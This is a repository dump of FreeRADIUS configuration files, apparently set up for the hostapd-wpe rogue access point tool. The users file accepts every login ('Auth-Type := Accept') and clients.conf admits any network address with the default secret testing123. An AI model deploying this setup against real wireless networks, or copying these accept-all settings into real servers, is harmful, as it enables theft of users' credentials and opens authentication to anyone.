42 | 60:1d:5e:9b:29:05:fa:22:45:8e:93:bb:b8:24:3c:e2:37:ab:
43 | 46:15:a8:64:d6:30:13:22:6a:e0:48:ed:e7:3d:71:f7:ca:d4:
44 | 5d:b1:06:b5:2d:7d:42:ea:13:cf:b9:3c:24:7b:39:2a:89:86:
45 | 62:85:cf:8d:00:51:96:bc:3c:83:0c:0e:7c:bc:a9:7d:02:1a:
46 | ee:16:57:c8:39:b5:25:20:93:1b:81:48:ec:c9:0b:39:42:dd:
47 | af:ef:1a:e0:a2:2e:df:3a:0a:e4:dc:3c:ee:59:79:39:bf:15:
48 | 83:f0:a9:ae:b0:94:0e:45:76:2c:ce:50:c4:93:bc:c8:60:41:
49 | 90:ce:09:af:ae:55:61:e5:83:82:ac:2e:df:95:3a:b9:e3:4d:
50 | 0d:74:24:d8:ff:3f:90:86:6f:c8:31:9f:bd:4d:5b:8e:b3:b8:
51 | 09:24:01:38:de:ea:00:bc:95:9e:7f:37:38:a2:61:74:09:f8:
52 | df:e6:4a:ed
53 | -----BEGIN CERTIFICATE-----
54 | MIIDojCCAoqgAwIBAgIBATANBgkqhkiG9w0BAQQFADCBkzELMAkGA1UEBhMCRlIx
55 | DzANBgNVBAgMBlJhZGl1czESMBAGA1UEBwwJU29tZXdoZXJlMRUwEwYDVQQKDAxF
56 | eGFtcGxlIEluYy4xIDAeBgkqhkiG9w0BCQEWEWFkbWluQGV4YW1wbGUuY29tMSYw
57 | JAYDVQQDDB1FeGFtcGxlIENlcnRpZmljYXRlIEF1dGhvcml0eTAeFw0xODAzMDcy
58 | MDI1NDVaFw0xOTAzMDcyMDI1NDVaMHwxCzAJBgNVBAYTAkZSMQ8wDQYDVQQIDAZS
59 | YWRpdXMxFTATBgNVBAoMDEV4YW1wbGUgSW5jLjEjMCEGA1UEAwwaRXhhbXBsZSBT
60 | ZXJ2ZXIgQ2VydGlmaWNhdGUxIDAeBgkqhkiG9w0BCQEWEWFkbWluQGV4YW1wbGUu
61 | Y29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwOvP9/Hbm4XDxR0U
62 | pCsO+QAgsaoU6w0QX0AfMLMy/T9G94iy97fMxMhJU/9nshu6g4GUrRjGCqGXo6AU
63 | 8k/6MpKM60/AvqkpGZPM4NVroIKjF3DIwsksON59oniY52BrnJEvJzUNx/V7fzp/
64 | AVIQpwxhD0RrSBzj9BQVPMA2ga9TP9ydf9ZOHaGqreTDaWoFnSkG/zb+8eNGY9hj
65 | Gzvl8c/wNs4pKB2FPN9LShc+xyOiBmT2K7o2yPQ0Vy+UXrz4enzYYovvg8YrFvkq
66 | a54htTd9fal+pIcbWr0BoFGt4+vOiy+aQsi4AqkVeSW1cSm/pAS1yVAuO8ePRe+2
67 | gY4cMQIDAQABoxcwFTATBgNVHSUEDDAKBggrBgEFBQcDATANBgkqhkiG9w0BAQQF
68 | AAOCAQEAAUzEKlUfdQVPzMMz3IXGIfI80q5CAldMwZioF8LMCgIGv+VOh8a9W7Rc
69 | Dx1uVSfdqjwN5lVSd44SGKUrErxns2Ihwt+Jj0EPYB1emykF+iJFjpO7uCQ84jer
70 | RhWoZNYwEyJq4Ejt5z1x98rUXbEGtS19QuoTz7k8JHs5KomGYoXPjQBRlrw8gwwO
71 | fLypfQIa7hZXyDm1JSCTG4FI7MkLOULdr+8a4KIu3zoK5Nw87ll5Ob8Vg/CprrCU
72 | DkV2LM5QxJO8yGBBkM4Jr65VYeWDgqwu35U6ueNNDXQk2P8/kIZvyDGfvU1bjrO4
73 | CSQBON7qALyVnn83OKJhdAn43+ZK7Q==
74 | -----END CERTIFICATE-----
75 |
--------------------------------------------------------------------------------
/files/hostapd_wpe/certs/Makefile:
--------------------------------------------------------------------------------
1 | ######################################################################
2 | #
3 | # Make file to be installed in /etc/raddb/certs to enable
4 | # the easy creation of certificates.
5 | #
6 | # See the README file in this directory for more information.
7 | #
8 | # $Id$
9 | #
10 | ######################################################################
11 |
12 | DH_KEY_SIZE = 1024
13 |
14 | #
15 | # Set the passwords
16 | #
17 | PASSWORD_SERVER = `grep output_password server.cnf | sed 's/.*=//;s/^ *//'`
18 | PASSWORD_CA = `grep output_password ca.cnf | sed 's/.*=//;s/^ *//'`
19 | PASSWORD_CLIENT = `grep output_password client.cnf | sed 's/.*=//;s/^ *//'`
20 |
21 | USER_NAME = `grep emailAddress client.cnf | grep '@' | sed 's/.*=//;s/^ *//'`
22 | CA_DEFAULT_DAYS = `grep default_days ca.cnf | sed 's/.*=//;s/^ *//'`
23 |
24 | ######################################################################
25 | #
26 | # Make the necessary files, but not client certificates.
27 | #
28 | ######################################################################
29 | .PHONY: all
30 | all: index.txt serial dh random server ca
31 |
32 | .PHONY: client
33 | client: client.pem
34 |
35 | .PHONY: ca
36 | ca: ca.der
37 |
38 | .PHONY: server
39 | server: server.pem server.vrfy
40 |
41 | ######################################################################
42 | #
43 | # Diffie-Hellman parameters
44 | #
45 | ######################################################################
46 | dh:
47 | openssl dhparam -out dh $(DH_KEY_SIZE)
48 |
49 | ######################################################################
50 | #
51 | # Create a new self-signed CA certificate
52 | #
53 | ######################################################################
54 | ca.key ca.pem: ca.cnf
55 | openssl req -new -x509 -keyout ca.key -out ca.pem \
56 | -days $(CA_DEFAULT_DAYS) -config ./ca.cnf
57 |
58 | ca.der: ca.pem
59 | openssl x509 -inform PEM -outform DER -in ca.pem -out ca.der
60 |
61 | ######################################################################
62 | #
63 | # Create a new server certificate, signed by the above CA.
64 | #
65 | ######################################################################
66 | server.csr server.key: server.cnf
67 | openssl req -new -out server.csr -keyout server.key -config ./server.cnf
68 |
69 | server.crt: server.csr ca.key ca.pem
70 | openssl ca -batch -keyfile ca.key -cert ca.pem -in server.csr -key $(PASSWORD_CA) -out server.crt -extensions xpserver_ext -extfile xpextensions -config ./server.cnf
71 |
72 | server.p12: server.crt
73 | openssl pkcs12 -export -in server.crt -inkey server.key -out server.p12 -passin pass:$(PASSWORD_SERVER) -passout pass:$(PASSWORD_SERVER)
74 |
75 | server.pem: server.p12
76 | openssl pkcs12 -in server.p12 -out server.pem -passin pass:$(PASSWORD_SERVER) -passout pass:$(PASSWORD_SERVER)
77 |
78 | .PHONY: server.vrfy
79 | server.vrfy: ca.pem
80 | openssl verify -CAfile ca.pem server.pem
81 |
82 | ######################################################################
83 | #
84 | # Create a new client certificate, signed by the the above server
85 | # certificate.
86 | #
87 | ######################################################################
88 | client.csr client.key: client.cnf
89 | openssl req -new -out client.csr -keyout client.key -config ./client.cnf
90 |
91 | client.crt: client.csr ca.pem ca.key
92 | openssl ca -batch -keyfile ca.key -cert ca.pem -in client.csr -key $(PASSWORD_CA) -out client.crt -extensions xpclient_ext -extfile xpextensions -config ./client.cnf
93 |
94 | client.p12: client.crt
95 | openssl pkcs12 -export -in client.crt -inkey client.key -out client.p12 -passin pass:$(PASSWORD_CLIENT) -passout pass:$(PASSWORD_CLIENT)
96 |
97 | client.pem: client.p12
98 | openssl pkcs12 -in client.p12 -out client.pem -passin pass:$(PASSWORD_CLIENT) -passout pass:$(PASSWORD_CLIENT)
99 | cp client.pem $(USER_NAME).pem
100 |
101 | .PHONY: client.vrfy
102 | client.vrfy: server.pem client.pem
103 | c_rehash .
104 | openssl verify -CApath . client.pem
105 |
106 | ######################################################################
107 | #
108 | # Miscellaneous rules.
109 | #
110 | ######################################################################
111 | index.txt:
112 | @touch index.txt
113 |
114 | serial:
115 | @echo '01' > serial
116 |
117 | random:
118 | @if [ -c /dev/urandom ] ; then \
119 | dd if=/dev/urandom of=./random count=10 >/dev/null 2>&1; \
120 | else \
121 | date > ./random; \
122 | fi
123 |
124 | print:
125 | openssl x509 -text -in server.crt
126 |
127 | printca:
128 | openssl x509 -text -in ca.pem
129 |
130 | clean:
131 | @rm -f *~ *old client.csr client.key client.crt client.p12 client.pem
132 |
133 | #
134 | # Make a target that people won't run too often.
135 | #
136 | destroycerts:
137 | rm -f *~ dh *.csr *.crt *.p12 *.der *.pem *.key index.txt* \
138 | serial* random *\.0 *\.1
139 |
--------------------------------------------------------------------------------
/files/users:
--------------------------------------------------------------------------------
1 | #
2 | # Please read the documentation file ../doc/processing_users_file,
3 | # or 'man 5 users' (after installing the server) for more information.
4 | #
5 | # This file contains authentication security and configuration
6 | # information for each user. Accounting requests are NOT processed
7 | # through this file. Instead, see 'acct_users', in this directory.
8 | #
9 | # The first field is the user's name and can be up to
10 | # 253 characters in length. This is followed (on the same line) with
11 | # the list of authentication requirements for that user. This can
12 | # include password, comm server name, comm server port number, protocol
13 | # type (perhaps set by the "hints" file), and huntgroup name (set by
14 | # the "huntgroups" file).
15 | #
16 | # If you are not sure why a particular reply is being sent by the
17 | # server, then run the server in debugging mode (radiusd -X), and
18 | # you will see which entries in this file are matched.
19 | #
20 | # When an authentication request is received from the comm server,
21 | # these values are tested. Only the first match is used unless the
22 | # "Fall-Through" variable is set to "Yes".
23 | #
24 | # A special user named "DEFAULT" matches on all usernames.
25 | # You can have several DEFAULT entries. All entries are processed
26 | # in the order they appear in this file. The first entry that
27 | # matches the login-request will stop processing unless you use
28 | # the Fall-Through variable.
29 | #
30 | # If you use the database support to turn this file into a .db or .dbm
31 | # file, the DEFAULT entries _have_ to be at the end of this file and
32 | # you can't have multiple entries for one username.
33 | #
34 | # Indented (with the tab character) lines following the first
35 | # line indicate the configuration values to be passed back to
36 | # the comm server to allow the initiation of a user session.
37 | # This can include things like the PPP configuration values
38 | # or the host to log the user onto.
39 | #
40 | # You can include another `users' file with `$INCLUDE users.other'
41 | #
42 |
43 | #
44 | # For a list of RADIUS attributes, and links to their definitions,
45 | # see:
46 | #
47 | # http://www.freeradius.org/rfc/attributes.html
48 | #
49 |
50 | #
51 | # Deny access for a specific user. Note that this entry MUST
52 | # be before any other 'Auth-Type' attribute which results in the user
53 | # being authenticated.
54 | #
55 | # Note that there is NO 'Fall-Through' attribute, so the user will not
56 | # be given any additional resources.
57 | #
58 | #lameuser Auth-Type := Reject
59 | # Reply-Message = "Your account has been disabled."
60 |
61 | #
62 | # Deny access for a group of users.
63 | #
64 | # Note that there is NO 'Fall-Through' attribute, so the user will not
65 | # be given any additional resources.
66 | #
67 | #DEFAULT Group == "disabled", Auth-Type := Reject
68 | # Reply-Message = "Your account has been disabled."
69 | #
70 |
71 | #
72 | # This is a complete entry for "steve". Note that there is no Fall-Through
73 | # entry so that no DEFAULT entry will be used, and the user will NOT
74 | # get any attributes in addition to the ones listed here.
75 | #
76 | #steve Cleartext-Password := "testing"
77 | # Service-Type = Framed-User,
78 | # Framed-Protocol = PPP,
79 | # Framed-IP-Address = 172.16.3.33,
80 | # Framed-IP-Netmask = 255.255.255.0,
81 | # Framed-Routing = Broadcast-Listen,
82 | # Framed-Filter-Id = "std.ppp",
83 | # Framed-MTU = 1500,
84 | # Framed-Compression = Van-Jacobsen-TCP-IP
85 |
86 | #
87 | # This is an entry for a user with a space in their name.
88 | # Note the double quotes surrounding the name.
89 | #
90 | #"John Doe" Cleartext-Password := "hello"
91 | # Reply-Message = "Hello, %{User-Name}"
92 |
93 | #
94 | # Dial user back and telnet to the default host for that port
95 | #
96 | #Deg Cleartext-Password := "ge55ged"
97 | # Service-Type = Callback-Login-User,
98 | # Login-IP-Host = 0.0.0.0,
99 | # Callback-Number = "9,5551212",
100 | # Login-Service = Telnet,
101 | # Login-TCP-Port = Telnet
102 |
103 | #
104 | # Another complete entry. After the user "dialbk" has logged in, the
105 | # connection will be broken and the user will be dialed back after which
106 | # he will get a connection to the host "timeshare1".
107 | #
108 | #dialbk Cleartext-Password := "callme"
109 | # Service-Type = Callback-Login-User,
110 | # Login-IP-Host = timeshare1,
111 | # Login-Service = PortMaster,
112 | # Callback-Number = "9,1-800-555-1212"
113 |
114 | #
115 | # user "swilson" will only get a static IP number if he logs in with
116 | # a framed protocol on a terminal server in Alphen (see the huntgroups file).
117 | #
118 | # Note that by setting "Fall-Through", other attributes will be added from
119 | # the following DEFAULT entries
120 | #
121 | #swilson Service-Type == Framed-User, Huntgroup-Name == "alphen"
122 | # Framed-IP-Address = 192.168.1.65,
123 | # Fall-Through = Yes
124 |
125 | #
126 | # If the user logs in as 'username.shell', then authenticate them
127 | # using the default method, give them shell access, and stop processing
128 | # the rest of the file.
129 | #
130 | #DEFAULT Suffix == ".shell"
131 | # Service-Type = Login-User,
132 | # Login-Service = Telnet,
133 | # Login-IP-Host = your.shell.machine
134 |
135 |
136 | #
137 | # The rest of this file contains the several DEFAULT entries.
138 | # DEFAULT entries match with all login names.
139 | # Note that DEFAULT entries can also Fall-Through (see first entry).
140 | # A name-value pair from a DEFAULT entry will _NEVER_ override
141 | # an already existing name-value pair.
142 | #
143 |
144 | #
145 | # Set up different IP address pools for the terminal servers.
146 | # Note that the "+" behind the IP address means that this is the "base"
147 | # IP address. The Port-Id (S0, S1 etc) will be added to it.
148 | #
149 | #DEFAULT Service-Type == Framed-User, Huntgroup-Name == "alphen"
150 | # Framed-IP-Address = 192.168.1.32+,
151 | # Fall-Through = Yes
152 |
153 | #DEFAULT Service-Type == Framed-User, Huntgroup-Name == "delft"
154 | # Framed-IP-Address = 192.168.2.32+,
155 | # Fall-Through = Yes
156 |
157 | #
158 | # Sample defaults for all framed connections.
159 | #
160 | #DEFAULT Service-Type == Framed-User
161 | # Framed-IP-Address = 255.255.255.254,
162 | # Framed-MTU = 576,
163 | # Service-Type = Framed-User,
164 | # Fall-Through = Yes
165 |
166 | #
167 | # Default for PPP: dynamic IP address, PPP mode, VJ-compression.
168 | # NOTE: we do not use Hint = "PPP", since PPP might also be auto-detected
169 | # by the terminal server in which case there may not be a "P" suffix.
170 | # The terminal server sends "Framed-Protocol = PPP" for auto PPP.
171 | #
172 | DEFAULT Framed-Protocol == PPP
173 | Framed-Protocol = PPP,
174 | Framed-Compression = Van-Jacobson-TCP-IP
175 |
176 | #
177 | # Default for CSLIP: dynamic IP address, SLIP mode, VJ-compression.
178 | #
179 | DEFAULT Hint == "CSLIP"
180 | Framed-Protocol = SLIP,
181 | Framed-Compression = Van-Jacobson-TCP-IP
182 |
183 | #
184 | # Default for SLIP: dynamic IP address, SLIP mode.
185 | #
186 | DEFAULT Hint == "SLIP"
187 | Framed-Protocol = SLIP
188 |
189 | #
190 | # Last default: rlogin to our main server.
191 | #
192 | #DEFAULT
193 | # Service-Type = Login-User,
194 | # Login-Service = Rlogin,
195 | # Login-IP-Host = shellbox.ispdomain.com
196 |
197 | # #
198 | # # Last default: shell on the local terminal server.
199 | # #
200 | # DEFAULT
201 | # Service-Type = Administrative-User
202 |
203 | # On no match, the user is denied access.
204 | #"bradtest" Cleartext-Password := "bradtest", MS-CHAP-Use-NTLM-Auth := 0
205 | DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0
206 | DEFAULT Cleartext-Password := "a"
207 |
208 | usuario Cleartext-Password := "clave"
209 | DEFAULT Auth-Type := Accept
210 |
--------------------------------------------------------------------------------
/files/clients.conf:
--------------------------------------------------------------------------------
1 | # -*- text -*-
2 | ##
3 | ## clients.conf -- client configuration directives
4 | ##
5 | ## $Id$
6 |
7 | #######################################################################
8 | #
9 | # Define RADIUS clients (usually a NAS, Access Point, etc.).
10 |
11 | #
12 | # Defines a RADIUS client.
13 | #
14 | # '127.0.0.1' is another name for 'localhost'. It is enabled by default,
15 | # to allow testing of the server after an initial installation. If you
16 | # are not going to be permitting RADIUS queries from localhost, we suggest
17 | # that you delete, or comment out, this entry.
18 | #
19 | #
20 |
21 | #
22 | # Each client has a "short name" that is used to distinguish it from
23 | # other clients.
24 | #
25 | # In version 1.x, the string after the word "client" was the IP
26 | # address of the client. In 2.0, the IP address is configured via
27 | # the "ipaddr" or "ipv6addr" fields. For compatibility, the 1.x
28 | # format is still accepted.
29 | #
30 | client localhost {
31 | # Allowed values are:
32 | # dotted quad (1.2.3.4)
33 | # hostname (radius.example.com)
34 | ipaddr = 127.0.0.1
35 |
36 | # OR, you can use an IPv6 address, but not both
37 | # at the same time.
38 | # ipv6addr = :: # any. ::1 == localhost
39 |
40 | #
41 | # A note on DNS: We STRONGLY recommend using IP addresses
42 | # rather than host names. Using host names means that the
43 | # server will do DNS lookups when it starts, making it
44 | # dependent on DNS. i.e. If anything goes wrong with DNS,
45 | # the server won't start!
46 | #
47 | # The server also looks up the IP address from DNS once, and
48 | # only once, when it starts. If the DNS record is later
49 | # updated, the server WILL NOT see that update.
50 | #
51 |
52 | # One client definition can be applied to an entire network.
53 | # e.g. 127/8 should be defined with "ipaddr = 127.0.0.0" and
54 | # "netmask = 8"
55 | #
56 | # If not specified, the default netmask is 32 (i.e. /32)
57 | #
58 | # We do NOT recommend using anything other than 32. There
59 | # are usually other, better ways to achieve the same goal.
60 | # Using netmasks of other than 32 can cause security issues.
61 | #
62 | # You can specify overlapping networks (127/8 and 127.0/16)
63 | # In that case, the smallest possible network will be used
64 | # as the "best match" for the client.
65 | #
66 | # Clients can also be defined dynamically at run time, based
67 | # on any criteria. e.g. SQL lookups, keying off of NAS-Identifier,
68 | # etc.
69 | # See raddb/sites-available/dynamic-clients for details.
70 | #
71 |
72 | # netmask = 32
73 |
74 | #
75 | # The shared secret use to "encrypt" and "sign" packets between
76 | # the NAS and FreeRADIUS. You MUST change this secret from the
77 | # default, otherwise it's not a secret any more!
78 | #
79 | # The secret can be any string, up to 8k characters in length.
80 | #
81 | # Control codes can be entered vi octal encoding,
82 | # e.g. "\101\102" == "AB"
83 | # Quotation marks can be entered by escaping them,
84 | # e.g. "foo\"bar"
85 | #
86 | # A note on security: The security of the RADIUS protocol
87 | # depends COMPLETELY on this secret! We recommend using a
88 | # shared secret that is composed of:
89 | #
90 | # upper case letters
91 | # lower case letters
92 | # numbers
93 | #
94 | # And is at LEAST 8 characters long, preferably 16 characters in
95 | # length. The secret MUST be random, and should not be words,
96 | # phrase, or anything else that is recognizable.
97 | #
98 | # The default secret below is only for testing, and should
99 | # not be used in any real environment.
100 | #
101 | secret = testing123
102 |
103 | #
104 | # Old-style clients do not send a Message-Authenticator
105 | # in an Access-Request. RFC 5080 suggests that all clients
106 | # SHOULD include it in an Access-Request. The configuration
107 | # item below allows the server to require it. If a client
108 | # is required to include a Message-Authenticator and it does
109 | # not, then the packet will be silently discarded.
110 | #
111 | # allowed values: yes, no
112 | require_message_authenticator = no
113 |
114 | #
115 | # The short name is used as an alias for the fully qualified
116 | # domain name, or the IP address.
117 | #
118 | # It is accepted for compatibility with 1.x, but it is no
119 | # longer necessary in 2.0
120 | #
121 | # shortname = localhost
122 |
123 | #
124 | # the following three fields are optional, but may be used by
125 | # checkrad.pl for simultaneous use checks
126 | #
127 |
128 | #
129 | # The nastype tells 'checkrad.pl' which NAS-specific method to
130 | # use to query the NAS for simultaneous use.
131 | #
132 | # Permitted NAS types are:
133 | #
134 | # cisco
135 | # computone
136 | # livingston
137 | # max40xx
138 | # multitech
139 | # netserver
140 | # pathras
141 | # patton
142 | # portslave
143 | # tc
144 | # usrhiper
145 | # other # for all other types
146 |
147 | #
148 | nastype = other # localhost isn't usually a NAS...
149 |
150 | #
151 | # The following two configurations are for future use.
152 | # The 'naspasswd' file is currently used to store the NAS
153 | # login name and password, which is used by checkrad.pl
154 | # when querying the NAS for simultaneous use.
155 | #
156 | # login = !root
157 | # password = someadminpas
158 |
159 | #
160 | # As of 2.0, clients can also be tied to a virtual server.
161 | # This is done by setting the "virtual_server" configuration
162 | # item, as in the example below.
163 | #
164 | # virtual_server = home1
165 |
166 | #
167 | # A pointer to the "home_server_pool" OR a "home_server"
168 | # section that contains the CoA configuration for this
169 | # client. For an example of a coa home server or pool,
170 | # see raddb/sites-available/originate-coa
171 | # coa_server = coa
172 | }
173 |
174 | # IPv6 Client
175 | #client ::1 {
176 | # secret = testing123
177 | # shortname = localhost
178 | #}
179 | #
180 | # All IPv6 Site-local clients
181 | #client fe80::/16 {
182 | # secret = testing123
183 | # shortname = localhost
184 | #}
185 |
186 | #client some.host.org {
187 | # secret = testing123
188 | # shortname = localhost
189 | #}
190 |
191 | #
192 | # You can now specify one secret for a network of clients.
193 | # When a client request comes in, the BEST match is chosen.
194 | # i.e. The entry from the smallest possible network.
195 | #
196 | #client 192.168.0.0/24 {
197 | # secret = testing123-1
198 | # shortname = private-network-1
199 | #}
200 | #
201 | #client 192.168.0.0/16 {
202 | # secret = testing123-2
203 | # shortname = private-network-2
204 | #}
205 |
206 | client 0.0.0.0/0 {
207 | secret = testing123
208 | shortname = name
209 | }
210 |
211 | #client 10.10.10.10 {
212 | # # secret and password are mapped through the "secrets" file.
213 | # secret = testing123
214 | # shortname = liv1
215 | # # the following three fields are optional, but may be used by
216 | # # checkrad.pl for simultaneous usage checks
217 | # nastype = livingston
218 | # login = !root
219 | # password = someadminpas
220 | #}
221 |
222 | #######################################################################
223 | #
224 | # Per-socket client lists. The configuration entries are exactly
225 | # the same as above, but they are nested inside of a section.
226 | #
227 | # You can have as many per-socket client lists as you have "listen"
228 | # sections, or you can re-use a list among multiple "listen" sections.
229 | #
230 | # Un-comment this section, and edit a "listen" section to add:
231 | # "clients = per_socket_clients". That IP address/port combination
232 | # will then accept ONLY the clients listed in this section.
233 | #
234 | #clients per_socket_clients {
235 | # client 192.168.3.4 {
236 | # secret = testing123
237 | # }
238 | #}
239 |
--------------------------------------------------------------------------------
/files/hostapd_wpe/certs/README:
--------------------------------------------------------------------------------
1 | This directory contains scripts to create the server certificates.
2 | To make a set of default (i.e. test) certificates, simply type:
3 |
4 | $ ./bootstrap
5 |
6 | The "openssl" command will be run against the sample configuration
7 | files included here, and will make a self-signed certificate authority
8 | (i.e. root CA), and a server certificate. This "root CA" should be
9 | installed on any client machine needing to do EAP-TLS, PEAP, or
10 | EAP-TTLS.
11 |
12 | The Microsoft "XP Extensions" will be automatically included in the
13 | server certificate. Without those extensions Windows clients will
14 | refuse to authenticate to FreeRADIUS.
15 |
16 | In general, you should use self-signed certificates for 802.1x (EAP)
17 | authentication. When you list root CAs from other organizations in
18 | the "CA_file", you permit them to masquerade as you, to authenticate
19 | your users, and to issue client certificates for EAP-TLS.
20 |
21 | If FreeRADIUS was configured to use OpenSSL, then simply starting
22 | the server in root in debugging mode should also create test
23 | certificates, i.e.:
24 |
25 | $ radiusd -X
26 |
27 | That will cause the EAP-TLS module to run the "bootstrap" script in
28 | this directory. The script will be executed only once, the first time
29 | the server has been installed on a particular machine. This bootstrap
30 | script SHOULD be run on installation of any pre-built binary package
31 | for your OS. In any case, the script will ensure that it is not run
32 | twice, and that it does not over-write any existing certificates.
33 |
34 | If you already have CA and server certificates, rename (or delete)
35 | this directory, and create a new "certs" directory containing your
36 | certificates. Note that the "make install" command will NOT
37 | over-write your existing "raddb/certs" directory, which means that the
38 | "bootstrap" command will not be run.
39 |
40 |
41 | NEW INSTALLATIONS OF FREERADIUS
42 |
43 |
44 | We suggest that new installations use the test certificates for
45 | initial tests, and then create real certificates to use for normal
46 | user authentication. See the instructions below for how to create the
47 | various certificates. The old test certificates can be deleted by
48 | running the following command:
49 |
50 | $ rm -f *.pem *.der *.csr *.crt *.key *.p12 serial* index.txt*
51 |
52 | Then, follow the instructions below for creating real certificates.
53 |
54 | Once the final certificates have been created, you can delete the
55 | "bootstrap" command from this directory, and delete the
56 | "make_cert_command" configuration from the "tls" sub-section of
57 | eap.conf.
58 |
59 | If you do not want to enable EAP-TLS, PEAP, or EAP-TTLS, then delete
60 | the relevant sub-sections from the "eap.conf" file.
61 |
62 |
63 | MAKING A ROOT CERTIFICATE
64 |
65 |
66 | $ vi ca.cnf
67 |
68 | Edit the "input_password" and "output_password" fields to be the
69 | password for the CA certificate.
70 |
71 | Edit the [certificate_authority] section to have the correct values
72 | for your country, state, etc.
73 |
74 | $ make ca.pem
75 |
76 | This step creates the CA certificate.
77 |
78 | $ make ca.der
79 |
80 | This step creates the DER format of the self-signed certificate,
81 | which is can be imported into Windows.
82 |
83 |
84 | MAKING A SERVER CERTIFICATE
85 |
86 |
87 | $ vi server.cnf
88 |
89 | Edit the "input_password" and "output_password" fields to be the
90 | password for the server certificate.
91 |
92 | Edit the [server] section to have the correct values for your
93 | country, state, etc. Be sure that the commonName field here is
94 | different from the commonName for the CA certificate.
95 |
96 | $ make server.pem
97 |
98 | This step creates the server certificate.
99 |
100 | If you have an existing certificate authority, and wish to create a
101 | certificate signing request for the server certificate, edit
102 | server.cnf as above, and type the following command.
103 |
104 | $ make server.csr
105 |
106 | You will have to ensure that the certificate contains the XP
107 | extensions needed by Microsoft clients.
108 |
109 |
110 | MAKING A CLIENT CERTIFICATE
111 |
112 |
113 | Client certificates are used by EAP-TLS, and optionally by EAP-TTLS
114 | and PEAP. The following steps outline how to create a client
115 | certificate that is signed by the server certificate created above.
116 | You will have to have the password for the server certificate in the
117 | "input_password" and "output_password" fields of the server.cnf file.
118 |
119 |
120 | $ vi client.cnf
121 |
122 | Edit the "input_password" and "output_password" fields to be the
123 | password for the client certificate. You will have to give these
124 | passwords to the end user who will be using the certificates.
125 |
126 | Edit the [client] section to have the correct values for your
127 | country, state, etc. Be sure that the commonName field here is
128 | the User-Name that will be used for logins!
129 |
130 | $ make client.pem
131 |
132 | The users certificate will be in "emailAddress.pem",
133 | i.e. "user@example.com.pem".
134 |
135 | To create another client certificate, just repeat the steps for
136 | making a client certificate, being sure to enter a different login
137 | name for "commonName", and a different password.
138 |
139 |
140 | PERFORMANCE
141 |
142 |
143 | EAP performance for EAP-TLS, TTLS, and PEAP is dominated by SSL
144 | calculations. That is, a normal system can handle PAP
145 | authentication at a rate of 10k packets/s. However, SSL involves
146 | RSA calculations, which are very expensive. To benchmark your system,
147 | do:
148 |
149 | $ openssl speed rsa
150 |
151 | or
152 |
153 | $ openssl speed rsa2048
154 |
155 | to test 2048 bit keys.
156 |
157 | A 1GHz system will likely do 30 calculations/s. A 2Ghz system may
158 | do 50 calculations/s, or more. That number is also the number of
159 | authentications/s that can be done for EAP-TLS (or TTLS, or PEAP).
160 |
161 |
162 | COMPATIBILITY
163 |
164 | The certificates created using this method are known to be compatible
165 | with ALL operating systems. Some common issues are:
166 |
167 | - Windows requires certain OID's in the certificates. If it doesn't
168 | see them, it will stop doing EAP. The most visibile effect is
169 | that the client starts EAP, gets a few Access-Challenge packets,
170 | and then a little while later re-starts EAP. If this happens, see
171 | the FAQ, and the comments in raddb/eap.conf for how to fix it.
172 |
173 | - Windows requires the root certificates to be on the client PC.
174 | If it doesn't have them, you will see the same issue as above.
175 |
176 | - Windows XP post SP2 has a bug where it has problems with
177 | certificate chains. i.e. if the server certificate is an
178 | intermediate one, and not a root one, then authentication will
179 | silently fail, as above.
180 |
181 | - Some versions of Windows CE cannot handle 4K RSA certificates.
182 | They will (again) silently fail, as above.
183 |
184 | - In none of these cases will Windows give the end user any
185 | reasonable error message describing what went wrong. This leads
186 | people to blame the RADIUS server. That blame is misplaced.
187 |
188 | - Certificate chains of more than 64K bytes are known to not work.
189 | This is a problem in FreeRADIUS. However, most clients cannot
190 | handle 64K certificate chains. Most Access Points will shut down
191 | the EAP session after about 50 round trips, while 64K certificate
192 | chains will take about 60 round trips. So don't use large
193 | certificate chains. They will only work after everyone upgrade
194 | everything in the network.
195 |
196 | - All other operating systems are known to work with EAP and
197 | FreeRADIUS. This includes Linux, *BSD, Mac OS X, Solaris,
198 | Symbian, along with all known embedded systems, phones, WiFi
199 | devices, etc.
200 |
201 | - Someone needs to ask Microsoft to please stop making life hard for
202 | their customers.
203 |
204 |
205 | SECURITY CONSIDERATIONS
206 |
207 | The default certificate configuration files uses MD5 for message
208 | digests, to maintain compatibility with network equipment that
209 | supports only this algorithm.
210 |
211 | MD5 has known weaknesses and is discouraged in favor of SHA1 (see
212 | http://www.kb.cert.org/vuls/id/836068 for details). If your network
213 | equipment supports the SHA1 signature algorithm, we recommend that you
214 | change the "ca.cnf", "server.cnf", and "client.cnf" files to specify
215 | the use of SHA1 for the certificates. To do this, change the
216 | 'default_md' entry in those files from 'md5' to 'sha1'.
217 |
--------------------------------------------------------------------------------
/files/eap.conf:
--------------------------------------------------------------------------------
1 | # -*- text -*-
2 | ##
3 | ## eap.conf -- Configuration for EAP types (PEAP, TTLS, etc.)
4 | ##
5 | ## $Id$
6 |
7 | #######################################################################
8 | #
9 | # Whatever you do, do NOT set 'Auth-Type := EAP'. The server
10 | # is smart enough to figure this out on its own. The most
11 | # common side effect of setting 'Auth-Type := EAP' is that the
12 | # users then cannot use ANY other authentication method.
13 | #
14 | # EAP types NOT listed here may be supported via the "eap2" module.
15 | # See experimental.conf for documentation.
16 | #
17 | eap {
18 | # Invoke the default supported EAP type when
19 | # EAP-Identity response is received.
20 | #
21 | # The incoming EAP messages DO NOT specify which EAP
22 | # type they will be using, so it MUST be set here.
23 | #
24 | # For now, only one default EAP type may be used at a time.
25 | #
26 | # If the EAP-Type attribute is set by another module,
27 | # then that EAP type takes precedence over the
28 | # default type configured here.
29 | #
30 | #default_eap_type = md5
31 | default_eap_type = peap
32 |
33 | # A list is maintained to correlate EAP-Response
34 | # packets with EAP-Request packets. After a
35 | # configurable length of time, entries in the list
36 | # expire, and are deleted.
37 | #
38 | timer_expire = 60
39 |
40 | # There are many EAP types, but the server has support
41 | # for only a limited subset. If the server receives
42 | # a request for an EAP type it does not support, then
43 | # it normally rejects the request. By setting this
44 | # configuration to "yes", you can tell the server to
45 | # instead keep processing the request. Another module
46 | # MUST then be configured to proxy the request to
47 | # another RADIUS server which supports that EAP type.
48 | #
49 | # If another module is NOT configured to handle the
50 | # request, then the request will still end up being
51 | # rejected.
52 | ignore_unknown_eap_types = no
53 |
54 | # Cisco AP1230B firmware 12.2(13)JA1 has a bug. When given
55 | # a User-Name attribute in an Access-Accept, it copies one
